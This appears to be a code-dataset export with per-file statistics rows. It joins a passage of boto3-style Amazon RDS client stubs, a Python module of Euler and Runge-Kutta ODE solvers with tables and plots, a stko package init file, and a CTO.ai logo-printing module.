Default: A random, system-chosen Availability Zone.
Constraint: You cannot specify the AvailabilityZone parameter if the MultiAZ parameter is set to true.
Example: us-east-1a
:type DBSubnetGroupName: string
:param DBSubnetGroupName: The DB subnet group name to use for the new instance.
Constraints: Must contain no more than 255 alphanumeric characters, periods, underscores, spaces, or hyphens. Must not be default.
Example: mySubnetgroup
:type MultiAZ: boolean
:param MultiAZ: Specifies if the DB instance is a Multi-AZ deployment.
Constraint: You cannot specify the AvailabilityZone parameter if the MultiAZ parameter is set to true .
:type PubliclyAccessible: boolean
:param PubliclyAccessible: Specifies the accessibility options for the DB instance. A value of true specifies an Internet-facing instance with a publicly resolvable DNS name, which resolves to a public IP address. A value of false specifies an internal instance with a DNS name that resolves to a private IP address.
Default: The default behavior varies depending on whether a VPC has been requested or not. The following list shows the default behavior in each case.
Default VPC: true
VPC: false
If no DB subnet group has been specified as part of the request and the PubliclyAccessible value has not been set, the DB instance will be publicly accessible. If a specific DB subnet group has been specified as part of the request and the PubliclyAccessible value has not been set, the DB instance will be private.
:type AutoMinorVersionUpgrade: boolean
:param AutoMinorVersionUpgrade: Indicates that minor version upgrades will be applied automatically to the DB instance during the maintenance window.
:type LicenseModel: string
:param LicenseModel: License model information for the restored DB instance.
Default: Same as source.
Valid values: license-included | bring-your-own-license | general-public-license
:type DBName: string
:param DBName: The database name for the restored DB instance.
Note
This parameter is not used for the MySQL or MariaDB engines.
:type Engine: string
:param Engine: The database engine to use for the new instance.
Default: The same as source
Constraint: Must be compatible with the engine of the source
Valid Values: MySQL | mariadb | oracle-se1 | oracle-se | oracle-ee | sqlserver-ee | sqlserver-se | sqlserver-ex | sqlserver-web | postgres | aurora
:type Iops: integer
:param Iops: The amount of Provisioned IOPS (input/output operations per second) to be initially allocated for the DB instance.
Constraints: Must be an integer greater than 1000.
SQL Server
Setting the IOPS value for the SQL Server database engine is not supported.
:type OptionGroupName: string
:param OptionGroupName: The name of the option group to be used for the restored DB instance.
Permanent options, such as the TDE option for Oracle Advanced Security TDE, cannot be removed from an option group, and that option group cannot be removed from a DB instance once it is associated with a DB instance
:type CopyTagsToSnapshot: boolean
:param CopyTagsToSnapshot: True to copy all tags from the restored DB instance to snapshots of the DB instance; otherwise false. The default is false.
:type Tags: list
:param Tags: A list of tags.
(dict) --Metadata assigned to an Amazon RDS resource consisting of a key-value pair.
Key (string) --A key is the required name of the tag. The string value can be from 1 to 128 Unicode characters in length and cannot be prefixed with 'aws:' or 'rds:'. The string can only contain the set of Unicode letters, digits, white-space, '_', '.', '/', '=', '+', '-' (Java regex: '^([\p{L}\p{Z}\p{N}_.:/=+\-]*)$').
Value (string) --A value is the optional value of the tag. The string value can be from 1 to 256 Unicode characters in length and cannot be prefixed with 'aws:' or 'rds:'. The string can only contain the set of Unicode letters, digits, white-space, '_', '.', '/', '=', '+', '-' (Java regex: '^([\p{L}\p{Z}\p{N}_.:/=+\-]*)$').
:type StorageType: string
:param StorageType: Specifies the storage type to be associated with the DB instance.
Valid values: standard | gp2 | io1
If you specify io1 , you must also include a value for the Iops parameter.
Default: io1 if the Iops parameter is specified; otherwise standard
:type TdeCredentialArn: string
:param TdeCredentialArn: The ARN from the Key Store with which to associate the instance for TDE encryption.
:type TdeCredentialPassword: string
:param TdeCredentialPassword: The password for the given ARN from the Key Store in order to access the device.
:type Domain: string
:param Domain: Specify the Active Directory Domain to restore the instance in.
:type DomainIAMRoleName: string
:param DomainIAMRoleName: Specify the name of the IAM role to be used when making API calls to the Directory Service.
:type EnableIAMDatabaseAuthentication: boolean
:param EnableIAMDatabaseAuthentication: True to enable mapping of AWS Identity and Access Management (IAM) accounts to database accounts; otherwise false.
You can enable IAM database authentication for the following database engines
For MySQL 5.6, minor version 5.6.34 or higher
For MySQL 5.7, minor version 5.7.16 or higher
Aurora 5.6 or higher.
Default: false
:rtype: dict
:return: {
'DBInstance': {
'DBInstanceIdentifier': 'string',
'DBInstanceClass': 'string',
'Engine': 'string',
'DBInstanceStatus': 'string',
'MasterUsername': 'string',
'DBName': 'string',
'Endpoint': {
'Address': 'string',
'Port': 123,
'HostedZoneId': 'string'
},
'AllocatedStorage': 123,
'InstanceCreateTime': datetime(2015, 1, 1),
'PreferredBackupWindow': 'string',
'BackupRetentionPeriod': 123,
'DBSecurityGroups': [
{
'DBSecurityGroupName': 'string',
'Status': 'string'
},
],
'VpcSecurityGroups': [
{
'VpcSecurityGroupId': 'string',
'Status': 'string'
},
],
'DBParameterGroups': [
{
'DBParameterGroupName': 'string',
'ParameterApplyStatus': 'string'
},
],
'AvailabilityZone': 'string',
'DBSubnetGroup': {
'DBSubnetGroupName': 'string',
'DBSubnetGroupDescription': 'string',
'VpcId': 'string',
'SubnetGroupStatus': 'string',
'Subnets': [
{
'SubnetIdentifier': 'string',
'SubnetAvailabilityZone': {
'Name': 'string'
},
'SubnetStatus': 'string'
},
],
'DBSubnetGroupArn': 'string'
},
'PreferredMaintenanceWindow': 'string',
'PendingModifiedValues': {
'DBInstanceClass': 'string',
'AllocatedStorage': 123,
'MasterUserPassword': 'string',
'Port': 123,
'BackupRetentionPeriod': 123,
'MultiAZ': True|False,
'EngineVersion': 'string',
'LicenseModel': 'string',
'Iops': 123,
'DBInstanceIdentifier': 'string',
'StorageType': 'string',
'CACertificateIdentifier': 'string',
'DBSubnetGroupName': 'string'
},
'LatestRestorableTime': datetime(2015, 1, 1),
'MultiAZ': True|False,
'EngineVersion': 'string',
'AutoMinorVersionUpgrade': True|False,
'ReadReplicaSourceDBInstanceIdentifier': 'string',
'ReadReplicaDBInstanceIdentifiers': [
'string',
],
'ReadReplicaDBClusterIdentifiers': [
'string',
],
'LicenseModel': 'string',
'Iops': 123,
'OptionGroupMemberships': [
{
'OptionGroupName': 'string',
'Status': 'string'
},
],
'CharacterSetName': 'string',
'SecondaryAvailabilityZone': 'string',
'PubliclyAccessible': True|False,
'StatusInfos': [
{
'StatusType': 'string',
'Normal': True|False,
'Status': 'string',
'Message': 'string'
},
],
'StorageType': 'string',
'TdeCredentialArn': 'string',
'DbInstancePort': 123,
'DBClusterIdentifier': 'string',
'StorageEncrypted': True|False,
'KmsKeyId': 'string',
'DbiResourceId': 'string',
'CACertificateIdentifier': 'string',
'DomainMemberships': [
{
'Domain': 'string',
'Status': 'string',
'FQDN': 'string',
'IAMRoleName': 'string'
},
],
'CopyTagsToSnapshot': True|False,
'MonitoringInterval': 123,
'EnhancedMonitoringResourceArn': 'string',
'MonitoringRoleArn': 'string',
'PromotionTier': 123,
'DBInstanceArn': 'string',
'Timezone': 'string',
'IAMDatabaseAuthenticationEnabled': True|False
}
}
:returns:
CreateDBInstance
DeleteDBInstance
ModifyDBInstance
"""
pass
def revoke_db_security_group_ingress(DBSecurityGroupName=None, CIDRIP=None, EC2SecurityGroupName=None, EC2SecurityGroupId=None, EC2SecurityGroupOwnerId=None):
"""
Revokes ingress from a DBSecurityGroup for previously authorized IP ranges or EC2 or VPC Security Groups. Required parameters for this API are one of CIDRIP, EC2SecurityGroupId for VPC, or (EC2SecurityGroupOwnerId and either EC2SecurityGroupName or EC2SecurityGroupId).
See also: AWS API Documentation
Examples
This example revokes ingress for the specified CIDR block associated with the specified DB security group.
Expected Output:
:example: response = client.revoke_db_security_group_ingress(
DBSecurityGroupName='string',
CIDRIP='string',
EC2SecurityGroupName='string',
EC2SecurityGroupId='string',
EC2SecurityGroupOwnerId='string'
)
:type DBSecurityGroupName: string
:param DBSecurityGroupName: [REQUIRED]
The name of the DB security group to revoke ingress from.
:type CIDRIP: string
:param CIDRIP: The IP range to revoke access from. Must be a valid CIDR range. If CIDRIP is specified, EC2SecurityGroupName , EC2SecurityGroupId and EC2SecurityGroupOwnerId cannot be provided.
:type EC2SecurityGroupName: string
:param EC2SecurityGroupName: The name of the EC2 security group to revoke access from. For VPC DB security groups, EC2SecurityGroupId must be provided. Otherwise, EC2SecurityGroupOwnerId and either EC2SecurityGroupName or EC2SecurityGroupId must be provided.
:type EC2SecurityGroupId: string
:param EC2SecurityGroupId: The ID of the EC2 security group to revoke access from. For VPC DB security groups, EC2SecurityGroupId must be provided. Otherwise, EC2SecurityGroupOwnerId and either EC2SecurityGroupName or EC2SecurityGroupId must be provided.
:type EC2SecurityGroupOwnerId: string
:param EC2SecurityGroupOwnerId: The AWS Account Number of the owner of the EC2 security group specified in the EC2SecurityGroupName parameter. The AWS Access Key ID is not an acceptable value. For VPC DB security groups, EC2SecurityGroupId must be provided. Otherwise, EC2SecurityGroupOwnerId and either EC2SecurityGroupName or EC2SecurityGroupId must be provided.
:rtype: dict
:return: {
'DBSecurityGroup': {
'OwnerId': 'string',
'DBSecurityGroupName': 'string',
'DBSecurityGroupDescription': 'string',
'VpcId': 'string',
'EC2SecurityGroups': [
{
'Status': 'string',
'EC2SecurityGroupName': 'string',
'EC2SecurityGroupId': 'string',
'EC2SecurityGroupOwnerId': 'string'
},
],
'IPRanges': [
{
'Status': 'string',
'CIDRIP': 'string'
},
],
'DBSecurityGroupArn': 'string'
}
}
:returns:
DescribeDBSecurityGroups
AuthorizeDBSecurityGroupIngress
CreateDBSecurityGroup
RevokeDBSecurityGroupIngress
"""
pass
def start_db_instance(DBInstanceIdentifier=None):
"""
Starts a DB instance that was stopped using the AWS console, the stop-db-instance AWS CLI command, or the StopDBInstance action. For more information, see Stopping and Starting a DB instance in the AWS RDS user guide.
See also: AWS API Documentation
:example: response = client.start_db_instance(
DBInstanceIdentifier='string'
)
:type DBInstanceIdentifier: string
:param DBInstanceIdentifier: [REQUIRED]
The user-supplied instance identifier of the stopped DB instance to start.
:rtype: dict
:return: {
'DBInstance': {
'DBInstanceIdentifier': 'string',
'DBInstanceClass': 'string',
'Engine': 'string',
'DBInstanceStatus': 'string',
'MasterUsername': 'string',
'DBName': 'string',
'Endpoint': {
'Address': 'string',
'Port': 123,
'HostedZoneId': 'string'
},
'AllocatedStorage': 123,
'InstanceCreateTime': datetime(2015, 1, 1),
'PreferredBackupWindow': 'string',
'BackupRetentionPeriod': 123,
'DBSecurityGroups': [
{
'DBSecurityGroupName': 'string',
'Status': 'string'
},
],
'VpcSecurityGroups': [
{
'VpcSecurityGroupId': 'string',
'Status': 'string'
},
],
'DBParameterGroups': [
{
'DBParameterGroupName': 'string',
'ParameterApplyStatus': 'string'
},
],
'AvailabilityZone': 'string',
'DBSubnetGroup': {
'DBSubnetGroupName': 'string',
'DBSubnetGroupDescription': 'string',
'VpcId': 'string',
'SubnetGroupStatus': 'string',
'Subnets': [
{
'SubnetIdentifier': 'string',
'SubnetAvailabilityZone': {
'Name': 'string'
},
'SubnetStatus': 'string'
},
],
'DBSubnetGroupArn': 'string'
},
'PreferredMaintenanceWindow': 'string',
'PendingModifiedValues': {
'DBInstanceClass': 'string',
'AllocatedStorage': 123,
'MasterUserPassword': 'string',
'Port': 123,
'BackupRetentionPeriod': 123,
'MultiAZ': True|False,
'EngineVersion': 'string',
'LicenseModel': 'string',
'Iops': 123,
'DBInstanceIdentifier': 'string',
'StorageType': 'string',
'CACertificateIdentifier': 'string',
'DBSubnetGroupName': 'string'
},
'LatestRestorableTime': datetime(2015, 1, 1),
'MultiAZ': True|False,
'EngineVersion': 'string',
'AutoMinorVersionUpgrade': True|False,
'ReadReplicaSourceDBInstanceIdentifier': 'string',
'ReadReplicaDBInstanceIdentifiers': [
'string',
],
'ReadReplicaDBClusterIdentifiers': [
'string',
],
'LicenseModel': 'string',
'Iops': 123,
'OptionGroupMemberships': [
{
'OptionGroupName': 'string',
'Status': 'string'
},
],
'CharacterSetName': 'string',
'SecondaryAvailabilityZone': 'string',
'PubliclyAccessible': True|False,
'StatusInfos': [
{
'StatusType': 'string',
'Normal': True|False,
'Status': 'string',
'Message': 'string'
},
],
'StorageType': 'string',
'TdeCredentialArn': 'string',
'DbInstancePort': 123,
'DBClusterIdentifier': 'string',
'StorageEncrypted': True|False,
'KmsKeyId': 'string',
'DbiResourceId': 'string',
'CACertificateIdentifier': 'string',
'DomainMemberships': [
{
'Domain': 'string',
'Status': 'string',
'FQDN': 'string',
'IAMRoleName': 'string'
},
],
'CopyTagsToSnapshot': True|False,
'MonitoringInterval': 123,
'EnhancedMonitoringResourceArn': 'string',
'MonitoringRoleArn': 'string',
'PromotionTier': 123,
'DBInstanceArn': 'string',
'Timezone': 'string',
'IAMDatabaseAuthenticationEnabled': True|False
}
}
:returns:
ModifyDBInstance
RebootDBInstance
RestoreDBInstanceFromDBSnapshot
RestoreDBInstanceToPointInTime
"""
pass
def stop_db_instance(DBInstanceIdentifier=None, DBSnapshotIdentifier=None):
    """
    Stops a DB instance. Amazon RDS retains the instance's metadata
    (endpoint, DB parameter group, option group membership) and its
    transaction logs, so a point-in-time restore remains possible.
    See also: AWS API Documentation

    :example: response = client.stop_db_instance(
        DBInstanceIdentifier='string',
        DBSnapshotIdentifier='string'
    )

    :type DBInstanceIdentifier: string
    :param DBInstanceIdentifier: [REQUIRED]
        The user-supplied instance identifier.

    :type DBSnapshotIdentifier: string
    :param DBSnapshotIdentifier: The user-supplied instance identifier of
        the DB Snapshot created immediately before the DB instance is
        stopped.

    :rtype: dict
    :return: {'DBInstance': {...}} — a description of the stopped instance:
        identifier, class, engine, status, master username, endpoint,
        storage settings, security/parameter/subnet groups, pending
        modified values, read-replica relationships, option group
        memberships, monitoring and encryption settings, ARNs, timezone,
        and IAM database authentication flag.

    :returns:
        CreateDBInstance
        DeleteDBInstance
        ModifyDBInstance
    """
    pass
| 45.071266
| 949
| 0.616018
| 45,188
| 434,487
| 5.908339
| 0.034699
| 0.013147
| 0.007528
| 0.008529
| 0.85791
| 0.824377
| 0.792794
| 0.769902
| 0.746695
| 0.730128
| 0
| 0.013469
| 0.312198
| 434,487
| 9,639
| 950
| 45.075941
| 0.879936
| 0.881845
| 0
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0.537234
| 0
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
dcb21bb3b3a56d7af3ac7b33111b74be4a94c1bd
| 7,081
|
py
|
Python
|
Lista6.py
|
EnzoItaliano/calculoNumericoEmPython
|
be3161b823955620be71e0f94a3421288fd28ef0
|
[
"MIT"
] | 1
|
2019-12-28T21:23:00.000Z
|
2019-12-28T21:23:00.000Z
|
Lista6.py
|
EnzoItaliano/calculoNumericoEmPython
|
be3161b823955620be71e0f94a3421288fd28ef0
|
[
"MIT"
] | null | null | null |
Lista6.py
|
EnzoItaliano/calculoNumericoEmPython
|
be3161b823955620be71e0f94a3421288fd28ef0
|
[
"MIT"
] | null | null | null |
import copy
import math
import numpy as np
from sympy import *
import plotly.graph_objects as go
from scipy.integrate import odeint
from prettytable import PrettyTable
x,y = symbols('x y')
def eulermethodf(f, a, b, x0, y0, n):
    """Euler's method for y' = f(x, y) on [a, b] with n steps, with errors.

    Prints a table of step index, x, the Euler estimate y, and the absolute
    difference against a reference solution computed by scipy's odeint on
    the same grid.

    f      -- sympy expression in the module-level symbols x, y
    a, b   -- interval endpoints; the step size is h = (b - a) / n
    x0, y0 -- initial condition
    n      -- number of Euler steps
    """
    expr = lambdify([x, y], f)
    h = (b - a) / n
    listaX = [x0]
    listaY = [y0]
    # Build the grid by repeated addition so it matches the increments
    # used by the Euler updates below exactly.
    for _ in range(n):
        listaX.append(listaX[-1] + h)
    for i in range(n):
        listaY.append(listaY[-1] + h * expr(listaX[i], listaY[-1]))

    def g(y_0, xs):
        # odeint expects f(y, t); adapt the lambdified f(x, y).
        return expr(xs, y_0)

    # Reference solution on the same grid, used only for the error column.
    w = odeint(g, y0, listaX)
    listaErr = [abs(w[i][0] - listaY[i]) for i in range(len(listaY))]

    Table = PrettyTable()
    Table.add_column("i", list(range(n + 1)))
    Table.add_column("X", listaX)
    Table.add_column("Y", listaY)
    Table.add_column("Erro", listaErr)
    print(Table)
def graficoeuler(f, a, b, x0, y0, n):
    """Plot Euler estimates for y' = f(x, y) against a dense reference.

    The reference curve is computed with odeint on a fine grid (step 0.001)
    and shown as a line; the Euler points are shown as markers.
    Parameters match eulermethodf.
    """
    expr = lambdify([x, y], f)
    h = (b - a) / n
    listaX = [x0]
    listaY = [y0]
    for _ in range(n):
        listaX.append(listaX[-1] + h)
    for i in range(n):
        listaY.append(listaY[-1] + h * expr(listaX[i], listaY[-1]))

    def g(y_0, xs):
        # odeint expects f(y, t); adapt the lambdified f(x, y).
        return expr(xs, y_0)

    z = np.arange(x0, listaX[-1] + 0.001, 0.001)
    w = odeint(g, y0, z)
    # odeint returns column vectors; flatten to plain floats for plotting.
    c = [float(v) for v in w]
    fig = go.Figure()
    fig.add_trace(go.Scatter(x=z, y=c, name='Solução Exata'))
    fig.add_trace(go.Scatter(x=listaX, y=listaY, name="Estimativa", mode="markers"))
    fig.show()
def eulermethod(f, a, b, x0, y0, n):
    """Euler's method for y' = f(x, y) on [a, b] with n steps.

    Prints a table of step index, x and the Euler estimate y (no error
    column — see eulermethodf for the variant with errors).
    Parameters match eulermethodf.
    """
    expr = lambdify([x, y], f)
    h = (b - a) / n
    listaX = [x0]
    listaY = [y0]
    for _ in range(n):
        listaX.append(listaX[-1] + h)
    for i in range(n):
        listaY.append(listaY[-1] + h * expr(listaX[i], listaY[-1]))

    Table = PrettyTable()
    Table.add_column("i", list(range(n + 1)))
    Table.add_column("X", listaX)
    Table.add_column("Y", listaY)
    print(Table)
def rk2(f, a, b, x0, y0, n):
    """Second-order Runge-Kutta (Heun's method) for y' = f(x, y), with errors.

    Prints a table of step index, x, the stage slopes K1/K2, the estimate y,
    and the absolute difference against an odeint reference solution.
    Parameters match eulermethodf.
    """
    expr = lambdify([x, y], f)
    h = (b - a) / n
    listaX = [x0]
    listaY = [y0]
    listaK1 = []
    listaK2 = []
    for _ in range(n):
        listaX.append(listaX[-1] + h)
    for i in range(n):
        listaK1.append(expr(listaX[i], listaY[i]))
        listaK2.append(expr(listaX[i] + h, listaY[i] + h * listaK1[i]))
        listaY.append(listaY[-1] + (h / 2) * (listaK1[-1] + listaK2[-1]))
    # Pad the K columns with "-" so every table column has n + 1 rows.
    listaK1.append("-")
    listaK2.append("-")

    def g(y_0, xs):
        # odeint expects f(y, t); adapt the lambdified f(x, y).
        return expr(xs, y_0)

    w = odeint(g, y0, listaX)
    listaErr = [abs(w[i][0] - listaY[i]) for i in range(len(listaY))]

    Table = PrettyTable()
    Table.add_column("i", list(range(n + 1)))
    Table.add_column("X", listaX)
    Table.add_column("K1", listaK1)
    Table.add_column("K2", listaK2)
    Table.add_column("Y", listaY)
    Table.add_column("Erro", listaErr)
    print(Table)
def graficork2(f, a, b, x0, y0, n):
    """Plot RK2 (Heun) estimates against a dense odeint reference solution.

    The reference curve uses a fine grid (step 0.001) as a line; the RK2
    points are shown as markers. Parameters match eulermethodf.
    """
    expr = lambdify([x, y], f)
    h = (b - a) / n
    listaX = [x0]
    listaY = [y0]
    listaK1 = []
    listaK2 = []
    for _ in range(n):
        listaX.append(listaX[-1] + h)
    for i in range(n):
        listaK1.append(expr(listaX[i], listaY[i]))
        listaK2.append(expr(listaX[i] + h, listaY[i] + h * listaK1[i]))
        listaY.append(listaY[-1] + (h / 2) * (listaK1[-1] + listaK2[-1]))

    def g(y_0, xs):
        # odeint expects f(y, t); adapt the lambdified f(x, y).
        return expr(xs, y_0)

    z = np.arange(x0, listaX[-1] + 0.001, 0.001)
    w = odeint(g, y0, z)
    c = [float(v) for v in w]
    fig = go.Figure()
    fig.add_trace(go.Scatter(x=z, y=c, name='Solução Exata'))
    fig.add_trace(go.Scatter(x=listaX, y=listaY, name="Estimativa", mode="markers"))
    fig.show()
def rk4(f, a, b, x0, y0, n):
    """Classical fourth-order Runge-Kutta for y' = f(x, y), with errors.

    Prints a table of step index, x, the stage slopes K1..K4, the estimate
    y, and the absolute difference against an odeint reference solution.
    Parameters match eulermethodf.
    """
    expr = lambdify([x, y], f)
    h = (b - a) / n
    listaX = [x0]
    listaY = [y0]
    listaK1 = []
    listaK2 = []
    listaK3 = []
    listaK4 = []
    for _ in range(n):
        listaX.append(listaX[-1] + h)
    for i in range(n):
        listaK1.append(expr(listaX[i], listaY[i]))
        listaK2.append(expr(listaX[i] + h / 2, listaY[i] + (h / 2) * listaK1[i]))
        listaK3.append(expr(listaX[i] + h / 2, listaY[i] + (h / 2) * listaK2[i]))
        listaK4.append(expr(listaX[i] + h, listaY[i] + h * listaK3[i]))
        listaY.append(listaY[-1] + (h / 6) * (listaK1[-1] + 2 * listaK2[-1]
                                              + 2 * listaK3[-1] + listaK4[-1]))
    # Pad the K columns with "-" so every table column has n + 1 rows.
    for col in (listaK1, listaK2, listaK3, listaK4):
        col.append("-")

    def g(y_0, xs):
        # odeint expects f(y, t); adapt the lambdified f(x, y).
        return expr(xs, y_0)

    w = odeint(g, y0, listaX)
    listaErr = [abs(w[i][0] - listaY[i]) for i in range(len(listaY))]

    Table = PrettyTable()
    Table.add_column("i", list(range(n + 1)))
    Table.add_column("X", listaX)
    Table.add_column("K1", listaK1)
    Table.add_column("K2", listaK2)
    Table.add_column("K3", listaK3)
    Table.add_column("K4", listaK4)
    Table.add_column("Y", listaY)
    Table.add_column("Erro", listaErr)
    print(Table)
def graficork4(f, a, b, x0, y0, n):
    """Plot RK4 estimates against a dense odeint reference solution.

    The reference curve uses a fine grid (step 0.001) as a line; the RK4
    points are shown as markers. Parameters match eulermethodf.
    (The original padded the K lists with "-" as the table functions do,
    but nothing here consumes them afterwards, so that dead code is gone.)
    """
    expr = lambdify([x, y], f)
    h = (b - a) / n
    listaX = [x0]
    listaY = [y0]
    listaK1 = []
    listaK2 = []
    listaK3 = []
    listaK4 = []
    for _ in range(n):
        listaX.append(listaX[-1] + h)
    for i in range(n):
        listaK1.append(expr(listaX[i], listaY[i]))
        listaK2.append(expr(listaX[i] + h / 2, listaY[i] + (h / 2) * listaK1[i]))
        listaK3.append(expr(listaX[i] + h / 2, listaY[i] + (h / 2) * listaK2[i]))
        listaK4.append(expr(listaX[i] + h, listaY[i] + h * listaK3[i]))
        listaY.append(listaY[-1] + (h / 6) * (listaK1[-1] + 2 * listaK2[-1]
                                              + 2 * listaK3[-1] + listaK4[-1]))

    def g(y_0, xs):
        # odeint expects f(y, t); adapt the lambdified f(x, y).
        return expr(xs, y_0)

    z = np.arange(x0, listaX[-1] + 0.001, 0.001)
    w = odeint(g, y0, z)
    c = [float(v) for v in w]
    fig = go.Figure()
    fig.add_trace(go.Scatter(x=z, y=c, name='Solução Exata'))
    fig.add_trace(go.Scatter(x=listaX, y=listaY, name="Estimativa", mode="markers"))
    fig.show()
# def f(x,y): return y-x
# def f(x,y): return x - y + 2
# eulermethodf(f(x,y), 0, 1, 0, 2, 4)
# graficoeuler(f(x,y), 0, 1, 0, 2, 4)
# eulermethod(f(x,y), 0, 1, 0, 2, 4)
# rk2(f(x,y), 0, 1, 0, 2, 5)
# graficork2(f(x,y), 0, 1, 0, 2, 5)
# rk4(f(x,y), 0, 1, 0, 2, 5)
# graficork4(f(x,y), 0, 1, 0, 2, 5)
| 26.82197
| 162
| 0.543285
| 1,134
| 7,081
| 3.357143
| 0.077601
| 0.044129
| 0.077226
| 0.057788
| 0.914368
| 0.903599
| 0.903599
| 0.903599
| 0.888889
| 0.888889
| 0
| 0.049463
| 0.263381
| 7,081
| 264
| 163
| 26.82197
| 0.680406
| 0.039542
| 0
| 0.922374
| 0
| 0
| 0.020465
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.059361
| false
| 0
| 0.031963
| 0.027397
| 0.118721
| 0.018265
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f49d420720937d33e66e7ed9f1b0b7747b81e1b4
| 146
|
py
|
Python
|
stko/calculators/extractors/__init__.py
|
stevenbennett96/stk_optimizers-1
|
c31b8b422df43f67bef265acadd0a6de500fbfc0
|
[
"MIT"
] | null | null | null |
stko/calculators/extractors/__init__.py
|
stevenbennett96/stk_optimizers-1
|
c31b8b422df43f67bef265acadd0a6de500fbfc0
|
[
"MIT"
] | null | null | null |
stko/calculators/extractors/__init__.py
|
stevenbennett96/stk_optimizers-1
|
c31b8b422df43f67bef265acadd0a6de500fbfc0
|
[
"MIT"
] | null | null | null |
from .extractor import * # noqa
from .xtb_extractor import * # noqa
from .orca_extractor import * # noqa
from .cp2k_extractor import * # noqa
| 29.2
| 37
| 0.726027
| 19
| 146
| 5.421053
| 0.368421
| 0.582524
| 0.737864
| 0.669903
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.008475
| 0.191781
| 146
| 4
| 38
| 36.5
| 0.864407
| 0.130137
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
f4e2e4144ff89fdc6788b7dc34ce53a6f4c4ea6b
| 3,529
|
py
|
Python
|
init_repo/logos.py
|
cto-ai/repo
|
6b2c8a8db4715ba6681dbd1735c919fce79acfea
|
[
"MIT"
] | 3
|
2020-04-25T14:45:51.000Z
|
2020-05-25T22:22:38.000Z
|
init_repo/logos.py
|
cto-ai/repo
|
6b2c8a8db4715ba6681dbd1735c919fce79acfea
|
[
"MIT"
] | 1
|
2020-03-06T18:52:06.000Z
|
2020-03-06T18:52:06.000Z
|
init_repo/logos.py
|
cto-ai/repo
|
6b2c8a8db4715ba6681dbd1735c919fce79acfea
|
[
"MIT"
] | null | null | null |
from cto_ai import sdk, ux
cto_terminal = """
[94m██████[39m[33m╗[39m [94m████████[39m[33m╗[39m [94m██████[39m[33m╗ [39m [94m█████[39m[33m╗[39m [94m██[39m[33m╗[39m
[94m██[39m[33m╔════╝[39m [33m╚══[39m[94m██[39m[33m╔══╝[39m [94m██[39m[33m╔═══[39m[94m██[39m[33m╗[39m [94m██[39m[33m╔══[39m[94m██[39m[33m╗[39m [94m██[39m[33m║[39m
[94m██[39m[33m║ [39m [94m ██[39m[33m║ [39m [94m██[39m[33m║[39m[94m ██[39m[33m║[39m [94m███████[39m[33m║[39m [94m██[39m[33m║[39m
[94m██[39m[33m║ [39m [94m ██[39m[33m║ [39m [94m██[39m[33m║[39m[94m ██[39m[33m║[39m [94m██[39m[33m╔══[39m[94m██[39m[33m║[39m [94m██[39m[33m║[39m
[33m╚[39m[94m██████[39m[33m╗[39m [94m ██[39m[33m║ [39m [33m╚[39m[94m██████[39m[33m╔╝[39m [94m██[39m[33m╗[39m [94m██[39m[33m║[39m[94m ██[39m[33m║[39m [94m██[39m[33m║[39m
[33m ╚═════╝[39m [33m ╚═╝ [39m [33m ╚═════╝ [39m [33m╚═╝[39m [33m╚═╝ ╚═╝[39m [33m╚═╝[39m
We’re building the world’s best developer experiences.
"""
cto_slack = """:white_square::white_square::white_square::white_square::white_square::white_square::white_square::white_square::white_square::white_square::white_square::white_square::white_square::white_square::white_square::white_square:
:white_square::white_square::black_square::black_square::white_square::white_square::black_square::black_square::black_square::white_square::white_square::white_square::black_square::black_square::black_square::white_square:
:white_square::black_square::white_square::white_square::black_square::white_square::black_square::white_square::white_square::black_square::white_square::black_square::white_square::white_square::white_square::white_square:
:white_square::black_square::white_square::white_square::black_square::white_square::black_square::black_square::black_square::white_square::white_square::white_square::black_square::black_square::white_square::white_square:
:white_square::black_square::white_square::white_square::black_square::white_square::black_square::white_square::white_square::white_square::white_square::white_square::white_square::white_square::black_square::white_square:
:white_square::white_square::black_square::black_square::white_square::white_square::black_square::white_square::white_square::white_square::white_square::black_square::black_square::black_square::white_square::white_square:
:white_square::white_square::white_square::white_square::white_square::white_square::white_square::white_square::white_square::white_square::white_square::white_square::white_square::white_square::white_square::white_square:"""
intro = """👋 Hi there! Welcome to the CTO.ai Repo Op!
This Op will allow you to create, delete, and archive remote repositories on GitHub, GitLab, and Bitbucket. \n
❓ How does it work?
You will be prompted for your version control platform of choice, the appropriate credentials, and the target repo. \n
ℹ️ Prerequisites
This Op will require personal access tokens with the following permission scopes:
🔑 GitHub: repo, delete_repo - https://github.com/settings/tokens/
🔑 GitLab: api, read_user, read_repository, write_repository, read_registry - https://gitlab.com/profile/personal_access_tokens
For more information, see the README. \n"""
def logo_print():
    """Print the CTO.ai logo variant matching the current interface.

    Terminal sessions get the ANSI-art banner; anything else (i.e. Slack)
    gets the emoji-square rendition.
    """
    is_terminal = sdk.get_interface_type() == 'terminal'
    ux.print(cto_terminal if is_terminal else cto_slack)
| 88.225
| 239
| 0.694531
| 665
| 3,529
| 3.986466
| 0.177444
| 0.340249
| 0.519427
| 0.514523
| 0.710675
| 0.700113
| 0.700113
| 0.675971
| 0.675971
| 0.675971
| 0
| 0.090375
| 0.084443
| 3,529
| 39
| 240
| 90.487179
| 0.628907
| 0
| 0
| 0
| 0
| 0.516129
| 0.938209
| 0.626701
| 0
| 0
| 0
| 0
| 0
| 1
| 0.032258
| false
| 0
